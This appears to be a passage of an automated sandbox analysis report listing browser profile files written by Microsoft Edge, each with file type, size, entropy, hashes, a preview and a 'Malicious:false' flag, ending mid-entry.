                                                                                                                                                                                                                                                                                                                  MD5:0962291D6D367570BEE5454721C17E11
                                                                                                                                                                                                                                                                                                                  SHA1:59D10A893EF321A706A9255176761366115BEDCB
                                                                                                                                                                                                                                                                                                                  SHA-256:EC1702806F4CC7C42A82FC2B38E89835FDE7C64BB32060E0823C9077CA92EFB7
                                                                                                                                                                                                                                                                                                                  SHA-512:F555E961B69E09628EAF9C61F465871E6984CD4D31014F954BB747351DAD9CEA6D17C1DB4BCA2C1EB7F187CB5F3C0518748C339C8B43BBD1DBD94AEAA16F58ED
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):8192
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.012340643231932763
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:MsGl3ll:/y
                                                                                                                                                                                                                                                                                                                  MD5:41876349CB12D6DB992F1309F22DF3F0
                                                                                                                                                                                                                                                                                                                  SHA1:5CF26B3420FC0302CD0A71E8D029739B8765BE27
                                                                                                                                                                                                                                                                                                                  SHA-256:E09F42C398D688DCE168570291F1F92D079987DEDA3099A34ADB9E8C0522B30C
                                                                                                                                                                                                                                                                                                                  SHA-512:E9A4FC1F7CB6AE2901F8E02354A92C4AAA7A53C640DCF692DB42A27A5ACC2A3BFB25A0DE0EB08AB53983132016E7D43132EA4292E439BB636AAFD53FB6EF907E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:FoxPro FPT, blocks size 768, next free block index 3284796353, field type 0
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):262512
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):9.553120663130604E-4
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:LsNl21:Ls3S
                                                                                                                                                                                                                                                                                                                  MD5:A867EF056D11193EE93D94B98B8D7862
                                                                                                                                                                                                                                                                                                                  SHA1:CE54C73875FF035727C785BCE2B8B20BA0FD2B21
                                                                                                                                                                                                                                                                                                                  SHA-256:C99ECF3B10F100563A582ABF25D5B9159ED80F1FD518EFB1347AC6173314B551
                                                                                                                                                                                                                                                                                                                  SHA-512:2B77034C4E094C79A31125C5DD9CEC52FC698FDC89F6121E70F97E73C3E88FE78E7C6B8EA75626B33F2E0D8FD24747C57CB9992445028BD4CC90BFA128EB9018
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:........................................AZ.P./.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):33
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.5394429593752084
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:iWstvhYNrkUn:iptAd
                                                                                                                                                                                                                                                                                                                  MD5:F27314DD366903BBC6141EAE524B0FDE
                                                                                                                                                                                                                                                                                                                  SHA1:4714D4A11C53CF4258C3A0246B98E5F5A01FBC12
                                                                                                                                                                                                                                                                                                                  SHA-256:68C7AD234755B9EDB06832A084D092660970C89A7305E0C47D327B6AC50DD898
                                                                                                                                                                                                                                                                                                                  SHA-512:07A0D529D9458DE5E46385F2A9D77E0987567BA908B53DDB1F83D40D99A72E6B2E3586B9F79C2264A83422C4E7FC6559CAC029A6F969F793F7407212BB3ECD51
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):303
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.2410942355472026
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJILR1wkn23oH+TcwtnG2tbB2KLl5bJDw/+q2Pwkn23oH+TcwtnG2tMsIFUv:72QfYebn9VFLy/+vYfYebn9GFUv
                                                                                                                                                                                                                                                                                                                  MD5:483D06BF3C9D3E39E8D59367E200E326
                                                                                                                                                                                                                                                                                                                  SHA1:711FBCEB3C77AF112B20499925703E85C1C3A405
                                                                                                                                                                                                                                                                                                                  SHA-256:18BF88F7B516FE5DFEB8644241FD8C23627B7F69BD83DCDB3C90F7D24CB49A25
                                                                                                                                                                                                                                                                                                                  SHA-512:3C6F5EBA24412A6D7D1B1DC5182F5778BF468D60585D1C541ADBAE8AA4A385981485B8C35CB4309AAD219941DAD6335AFF7594855D7E837E2CFBF6D0EBFB0281
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.794 83c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db since it was missing..2025/01/09-04:59:17.113 83c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EdgeCoupons/coupons_data.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 14, database pages 8, cookie 0xe, schema 4, UTF-8, version-valid-for 14
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):32768
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.494709561094235
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLEC30OIcqIn2o0FUFlA2cs0US5S693Xlej2:ThLaJUnAg0UB6I
                                                                                                                                                                                                                                                                                                                  MD5:CF7760533536E2AF66EA68BC3561B74D
                                                                                                                                                                                                                                                                                                                  SHA1:E991DE2EA8F42AE7E0A96A3B3B8AF87A689C8CCD
                                                                                                                                                                                                                                                                                                                  SHA-256:E1F183FAE5652BA52F5363A7E28BF62B53E7781314C9AB76B5708AF9918BE066
                                                                                                                                                                                                                                                                                                                  SHA-512:38B15FE7503F6DFF9D39BC74AA0150A7FF038029F973BE9A37456CDE6807BCBDEAB06E624331C8DFDABE95A5973B0EE26A391DB2587E614A37ADD50046470162
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...i............t...c................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 5, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 5
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.6136085345511961
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:24:TLqpR+DDNzWjJ0npnyXKUO8+jUEXpPcmL:Te8D4jJ/6Up+QEFZ
                                                                                                                                                                                                                                                                                                                  MD5:B0BDD71CDA369D6066CEA6F0EC7AA081
                                                                                                                                                                                                                                                                                                                  SHA1:B2C354C3DA56F2A15DFC6E693DE062E986B41397
                                                                                                                                                                                                                                                                                                                  SHA-256:B1DB1CB6BFA613E0758550498883745BF8051C1C11AC312B54D005C62202607C
                                                                                                                                                                                                                                                                                                                  SHA-512:D82E1AB381E705EBC428BED2208A00DDB0DBB354C563C69533E71B6ADE3EF893E4370FF34D96CC545A51D1B5EC55961B76FDBB67E8A5799D2B536E385CA271B2
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):375520
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.354073399691121
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:XA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:XFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                                                                                                                                                                  MD5:5CAF7677B74B0FCC9D465CD1B3927C6F
                                                                                                                                                                                                                                                                                                                  SHA1:24A5D8E6B7142C050718A67FA0A88362E08AA498
                                                                                                                                                                                                                                                                                                                  SHA-256:324284103AEB5BFAA165600677CE1370D700E6B429BBDF8BC817E27DB9B197DB
                                                                                                                                                                                                                                                                                                                  SHA-512:CE4F7943279C83679E459BBE57ECC29D1B7AEF37F2BD5A894EC3EB5955C547B3A4D0AD97DE6FC812A46C15EBFFA617CC4F5592F5ECBEAE5D0E1F0708276413F4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...m.................DB_VERSION.1PX.[q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380890361055620..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):309
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.166989213440954
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJJeeq1wkn23oH+Tcwtk2WwnvB2KLl5bJJ0P+q2Pwkn23oH+Tcwtk2WwnvIF2:7vz1fYebkxwnvFLjbvYfYebkxwnQFUv
                                                                                                                                                                                                                                                                                                                  MD5:CBAF4C644FD04A4719D8C99C95128D80
                                                                                                                                                                                                                                                                                                                  SHA1:38DF5E4D1EC6F5442B45822DF31B6914B431E46C
                                                                                                                                                                                                                                                                                                                  SHA-256:19E95481F8424B0750BE6E52AC9485DBDCA73E4B506CC161446E749B9274D131
                                                                                                                                                                                                                                                                                                                  SHA-512:F642DB73D35CDF5998BA6E46E3C03817739890BC0D5C785C81D917A8171BA63D080A33029BD6B80FA742BA07C60544ABCC60E41ECEDBFAA24D139F3EC4F98DCA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:20.252 2288 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-04:59:20.335 2288 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                  SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.|.."....leveldb.BytewiseComparator......
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                                  Size (bytes):358860
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.324613574733869
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6Rz:C1gAg1zfvb
                                                                                                                                                                                                                                                                                                                  MD5:5A0483FEDBAB4DB780A2B13E147404EF
                                                                                                                                                                                                                                                                                                                  SHA1:4546BB699F5972C415004159295F9B75D9A8D2F8
                                                                                                                                                                                                                                                                                                                  SHA-256:407C7E15ED4B0EEF098601A0CB8382C8A3EF143FA1DB81C04D23D8F0BF522CB1
                                                                                                                                                                                                                                                                                                                  SHA-512:8964F55288F49ABEA54C036E31AC1616253F00B94DD4BC92DED9C43A14DBE195F3F96BEA66205DE72C4BFE909FC77763F5757B456DB2DFB29700C04134C12B95
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):209
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.8784775129881184
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:FQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlXNQxlX:qTCTCTCTCTCTCTCTCTCTCT
                                                                                                                                                                                                                                                                                                                  MD5:478D49D9CCB25AC14589F834EA70FB9E
                                                                                                                                                                                                                                                                                                                  SHA1:5D30E87D66E279F8815AFFE4C691AAF1D577A21E
                                                                                                                                                                                                                                                                                                                  SHA-256:BB6CC6DF54CF476D95409032C79E065F4E10D512E73F7E16018E550456F753D5
                                                                                                                                                                                                                                                                                                                  SHA-512:FB5431054A23D3C532568B1F150873D9130DBC4A88BE19BC2A4907D0DC2888C5B55993154EAD4A6C466E2173092B8705684A6802B850F051639E1F2457387471
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):16
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                  MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                  SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                  SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                  SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):281
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.192637631620019
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:6:iOrbJITB1wkn23oH+Tcwt8aVdg2KLl5bJDEKs3cM+q2Pwkn23oH+Tcwt8aPrqIF2:72wfYeb0L2Ks3cM+vYfYebL3FUv
                                                                                                                                                                                                                                                                                                                  MD5:CA60EDC3E755F8102498B8EC57287BFD
                                                                                                                                                                                                                                                                                                                  SHA1:E03380793E3544500DC889012BF9B05624836D09
                                                                                                                                                                                                                                                                                                                  SHA-256:1901DD2CF11FEE04C01E44959C0A5A98647F5ED4769BB06F9AFB2436B93D6950
                                                                                                                                                                                                                                                                                                                  SHA-512:7B11E29C441AFDCD0B41D3C681DB1A983CB0708D467FB03F5C91C1D339FED111BEEDF5F1012A2687DA97975EA09CC0FBA31D7929A08DE96426EA49180FCD9127
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:2025/01/09-04:59:16.796 168c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules since it was missing..2025/01/09-04:59:17.092 168c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):41
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                  MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                  SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                  SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
